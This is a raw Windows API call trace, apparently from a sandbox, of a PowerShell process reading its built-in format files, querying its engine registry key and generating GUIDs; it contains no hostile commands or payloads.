	[0353.233] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.233] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.233] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.233] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.233] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.499] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.500] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.501] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0xbce, lpOverlapped=0x0) returned 1
	[0353.501] ReadFile (in: hFile=0x32c, lpBuffer=0x34cace6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cace6*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0353.501] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0353.501] CloseHandle (hObject=0x32c) returned 1
	[0353.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0353.501] SetErrorMode (uMode=0x1) returned 0x1
	[0353.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0353.501] SetErrorMode (uMode=0x1) returned 0x1
	[0353.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0353.502] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ce88 | out: phkResult=0x10ce88*=0x32c) returned 0x0
	[0353.502] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ce0c, lpData=0x0, lpcbData=0x10ce08*=0x0 | out: lpType=0x10ce0c*=0x1, lpData=0x0, lpcbData=0x10ce08*=0x56) returned 0x0
	[0353.502] CoTaskMemAlloc (cb=0x5a) returned 0x3a3220
	[0353.502] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cddc, lpData=0x3a3220, lpcbData=0x10cdd8*=0x56 | out: lpType=0x10cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cdd8*=0x56) returned 0x0
	[0353.502] CoTaskMemFree (pv=0x3a3220) 
	[0353.502] RegCloseKey (hKey=0x32c) returned 0x0
	[0353.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0353.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0353.512] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x1006f374, Data2=0xd6c0, Data3=0x4c84, Data4=([0]=0xa7, [1]=0xf8, [2]=0xb6, [3]=0x50, [4]=0xc1, [5]=0x6f, [6]=0xab, [7]=0x92))) returned 0x0
	[0353.513] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x8921aaef, Data2=0x7339, Data3=0x4d03, Data4=([0]=0xb6, [1]=0xd4, [2]=0x46, [3]=0x40, [4]=0x58, [5]=0x51, [6]=0x88, [7]=0x2))) returned 0x0
	[0353.513] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xd2c2597c, Data2=0xd157, Data3=0x4481, Data4=([0]=0x83, [1]=0x9e, [2]=0x6a, [3]=0xd3, [4]=0x48, [5]=0xc6, [6]=0xc0, [7]=0xae))) returned 0x0
	[0353.514] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xf5ba2e8b, Data2=0xb896, Data3=0x40c4, Data4=([0]=0x99, [1]=0xff, [2]=0xde, [3]=0xf3, [4]=0x1c, [5]=0x12, [6]=0x51, [7]=0x63))) returned 0x0
	[0353.515] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x9ed4554, Data2=0x8ca6, Data3=0x404e, Data4=([0]=0x96, [1]=0xa9, [2]=0x44, [3]=0x98, [4]=0xce, [5]=0x6a, [6]=0xcc, [7]=0xae))) returned 0x0
	[0353.515] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xa0839626, Data2=0xb11e, Data3=0x457a, Data4=([0]=0x8a, [1]=0x89, [2]=0xfd, [3]=0x7d, [4]=0x7f, [5]=0x49, [6]=0xc, [7]=0x6a))) returned 0x0
	[0353.515] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.516] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x729d00c1, Data2=0xdb61, Data3=0x496d, Data4=([0]=0xba, [1]=0xae, [2]=0x22, [3]=0xfe, [4]=0x32, [5]=0x41, [6]=0x45, [7]=0xcf))) returned 0x0
	[0353.517] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.518] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.519] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x4065de93, Data2=0xfe17, Data3=0x4069, Data4=([0]=0xa9, [1]=0x49, [2]=0x58, [3]=0x7d, [4]=0x91, [5]=0xfe, [6]=0x5c, [7]=0xb9))) returned 0x0
	[0353.519] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xf3375799, Data2=0xaae1, Data3=0x4506, Data4=([0]=0x96, [1]=0xb6, [2]=0x5d, [3]=0x7, [4]=0x57, [5]=0xe, [6]=0x60, [7]=0x2d))) returned 0x0
	[0353.519] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7700585d, Data2=0x60ce, Data3=0x4939, Data4=([0]=0x80, [1]=0x9a, [2]=0x46, [3]=0x39, [4]=0x3e, [5]=0xac, [6]=0x83, [7]=0x79))) returned 0x0
	[0353.519] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x9329dee6, Data2=0x3a2a, Data3=0x4c4b, Data4=([0]=0x95, [1]=0xe4, [2]=0xc0, [3]=0x77, [4]=0xb7, [5]=0xbb, [6]=0x92, [7]=0x73))) returned 0x0
	[0353.519] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.519] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xa4ba35d3, Data2=0x1667, Data3=0x4b88, Data4=([0]=0x8b, [1]=0x4a, [2]=0x99, [3]=0xd1, [4]=0xa0, [5]=0x34, [6]=0x3e, [7]=0xbf))) returned 0x0
	[0353.519] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.519] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.520] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.520] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.520] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.520] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xca4a9105, Data2=0x212d, Data3=0x4336, Data4=([0]=0xaa, [1]=0xbe, [2]=0xe9, [3]=0x37, [4]=0x39, [5]=0x7e, [6]=0xc4, [7]=0x17))) returned 0x0
	[0353.520] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xcacb4a7b, Data2=0x2171, Data3=0x42b9, Data4=([0]=0x81, [1]=0x52, [2]=0x9d, [3]=0xc0, [4]=0x1, [5]=0xe8, [6]=0x1e, [7]=0x70))) returned 0x0
	[0353.520] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x408f601d, Data2=0x1826, Data3=0x40a5, Data4=([0]=0xb3, [1]=0x6b, [2]=0x52, [3]=0x4a, [4]=0xde, [5]=0xe3, [6]=0xb1, [7]=0x66))) returned 0x0
	[0353.520] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x560e190a, Data2=0xada1, Data3=0x442a, Data4=([0]=0xb4, [1]=0xdc, [2]=0xfa, [3]=0x82, [4]=0x26, [5]=0x56, [6]=0x5d, [7]=0x4d))) returned 0x0
	[0353.520] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x3514668b, Data2=0x6940, Data3=0x4b04, Data4=([0]=0x82, [1]=0x28, [2]=0x5a, [3]=0x20, [4]=0x2, [5]=0xa4, [6]=0x40, [7]=0xf5))) returned 0x0
	[0353.521] VirtualQuery (in: lpAddress=0x10bd20, lpBuffer=0x10cbe0, dwLength=0x30 | out: lpBuffer=0x10cbe0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.521] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x3d34482f, Data2=0x9335, Data3=0x4a83, Data4=([0]=0x83, [1]=0xbb, [2]=0x51, [3]=0x20, [4]=0xaf, [5]=0x4b, [6]=0x9f, [7]=0xd0))) returned 0x0
	[0353.521] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xcf851f7b, Data2=0xf408, Data3=0x4da4, Data4=([0]=0x89, [1]=0x7c, [2]=0x11, [3]=0xb1, [4]=0xab, [5]=0xf, [6]=0x12, [7]=0x7a))) returned 0x0
	[0353.521] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x98f2f49f, Data2=0x442, Data3=0x4f4c, Data4=([0]=0xa6, [1]=0xe5, [2]=0x44, [3]=0xb, [4]=0x23, [5]=0x2c, [6]=0x41, [7]=0x7e))) returned 0x0
	[0353.521] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x392ac228, Data2=0xe9b5, Data3=0x4ea8, Data4=([0]=0x90, [1]=0xb2, [2]=0x50, [3]=0x77, [4]=0x85, [5]=0x25, [6]=0x7e, [7]=0xa8))) returned 0x0
	[0353.521] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x1ed55b94, Data2=0x149b, Data3=0x4e0d, Data4=([0]=0xab, [1]=0x54, [2]=0x24, [3]=0x88, [4]=0xb, [5]=0xf, [6]=0xf6, [7]=0xff))) returned 0x0
	[0353.521] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x51c01d42, Data2=0xfee8, Data3=0x4257, Data4=([0]=0x9f, [1]=0x66, [2]=0x39, [3]=0x40, [4]=0x55, [5]=0xf9, [6]=0xa8, [7]=0x77))) returned 0x0
	[0353.521] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7b6c9025, Data2=0x75e0, Data3=0x4bc3, Data4=([0]=0xa6, [1]=0x65, [2]=0xed, [3]=0xeb, [4]=0x6c, [5]=0x42, [6]=0xb9, [7]=0x98))) returned 0x0
	[0353.521] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xbb3d3d03, Data2=0x9c63, Data3=0x4be6, Data4=([0]=0x91, [1]=0xac, [2]=0xb7, [3]=0x2c, [4]=0xe6, [5]=0x12, [6]=0xf2, [7]=0xdf))) returned 0x0
	[0353.521] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x8af04b3a, Data2=0x6f39, Data3=0x42f9, Data4=([0]=0x92, [1]=0x9a, [2]=0x2d, [3]=0xe7, [4]=0x25, [5]=0xd7, [6]=0x8f, [7]=0xc7))) returned 0x0
	[0353.522] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xd202c430, Data2=0x9f79, Data3=0x401b, Data4=([0]=0x9c, [1]=0x8c, [2]=0x5e, [3]=0x5c, [4]=0x38, [5]=0x47, [6]=0xdf, [7]=0x8d))) returned 0x0
	[0353.522] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x14fd5374, Data2=0xdc73, Data3=0x44de, Data4=([0]=0xae, [1]=0xa, [2]=0xbb, [3]=0x9d, [4]=0x9a, [5]=0x45, [6]=0x15, [7]=0xae))) returned 0x0
	[0353.522] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x4bf2d791, Data2=0x2f17, Data3=0x4eeb, Data4=([0]=0x9f, [1]=0x94, [2]=0xf2, [3]=0x6a, [4]=0xef, [5]=0x66, [6]=0x57, [7]=0x9c))) returned 0x0
	[0353.522] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xb12b9f3e, Data2=0xe4ed, Data3=0x4ffc, Data4=([0]=0x9d, [1]=0xf7, [2]=0x24, [3]=0x95, [4]=0xdd, [5]=0x61, [6]=0xe, [7]=0xab))) returned 0x0
	[0353.522] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xf0f7f96a, Data2=0x870d, Data3=0x4037, Data4=([0]=0x8e, [1]=0x52, [2]=0xce, [3]=0xb, [4]=0x51, [5]=0xe0, [6]=0x18, [7]=0x27))) returned 0x0
	[0353.522] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x77d18a9f, Data2=0x8a05, Data3=0x4b36, Data4=([0]=0x8e, [1]=0xd0, [2]=0x9e, [3]=0xf3, [4]=0x1, [5]=0x11, [6]=0x16, [7]=0x55))) returned 0x0
	[0353.522] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xdb65e001, Data2=0xeb65, Data3=0x4457, Data4=([0]=0xbe, [1]=0x61, [2]=0xcb, [3]=0x96, [4]=0x46, [5]=0xed, [6]=0x16, [7]=0xcb))) returned 0x0
	[0353.522] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x512d5cd7, Data2=0xacb6, Data3=0x4841, Data4=([0]=0x86, [1]=0x29, [2]=0x0, [3]=0x36, [4]=0x1, [5]=0xd7, [6]=0x54, [7]=0x10))) returned 0x0
	[0353.522] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x4605f3c2, Data2=0x6477, Data3=0x4684, Data4=([0]=0x81, [1]=0xbb, [2]=0x2c, [3]=0x10, [4]=0x91, [5]=0xb8, [6]=0xa8, [7]=0x8f))) returned 0x0
	[0353.523] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7bb1796c, Data2=0xe541, Data3=0x4b73, Data4=([0]=0xbb, [1]=0x45, [2]=0x52, [3]=0x1d, [4]=0x5b, [5]=0x75, [6]=0x10, [7]=0xe3))) returned 0x0
	[0353.523] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.523] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.523] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.523] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x1cf96161, Data2=0x602c, Data3=0x4ac4, Data4=([0]=0xb6, [1]=0x4c, [2]=0x65, [3]=0xda, [4]=0xad, [5]=0x6f, [6]=0x1e, [7]=0x66))) returned 0x0
	[0353.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0353.524] SetErrorMode (uMode=0x1) returned 0x1
	[0353.524] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0353.524] GetFileType (hFile=0x1cc) returned 0x1
	[0353.524] SetErrorMode (uMode=0x1) returned 0x1
	[0353.524] GetFileType (hFile=0x1cc) returned 0x1
	[0353.524] ReadFile (in: hFile=0x1cc, lpBuffer=0x2e46b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e46b78*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.525] ReadFile (in: hFile=0x1cc, lpBuffer=0x2e46b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e46b78*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.525] ReadFile (in: hFile=0x1cc, lpBuffer=0x2e46b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e46b78*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.525] ReadFile (in: hFile=0x1cc, lpBuffer=0x2e46b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e46b78*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.526] ReadFile (in: hFile=0x1cc, lpBuffer=0x2e46b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e46b78*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.526] ReadFile (in: hFile=0x1cc, lpBuffer=0x2e46b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e46b78*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.526] ReadFile (in: hFile=0x1cc, lpBuffer=0x2e46b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e46b78*, lpNumberOfBytesRead=0x10cdf8*=0x119, lpOverlapped=0x0) returned 1
	[0353.526] ReadFile (in: hFile=0x1cc, lpBuffer=0x2e46b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2e46b78*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0353.526] CloseHandle (hObject=0x1cc) returned 1
	[0353.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0353.526] SetErrorMode (uMode=0x1) returned 0x1
	[0353.526] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0353.527] SetErrorMode (uMode=0x1) returned 0x1
	[0353.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0353.527] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ce88 | out: phkResult=0x10ce88*=0x1cc) returned 0x0
	[0353.527] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ce0c, lpData=0x0, lpcbData=0x10ce08*=0x0 | out: lpType=0x10ce0c*=0x1, lpData=0x0, lpcbData=0x10ce08*=0x56) returned 0x0
	[0353.527] CoTaskMemAlloc (cb=0x5a) returned 0x3cc550
	[0353.527] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cddc, lpData=0x3cc550, lpcbData=0x10cdd8*=0x56 | out: lpType=0x10cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cdd8*=0x56) returned 0x0
	[0353.527] CoTaskMemFree (pv=0x3cc550) 
	[0353.527] RegCloseKey (hKey=0x1cc) returned 0x0
	[0353.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0353.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0353.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
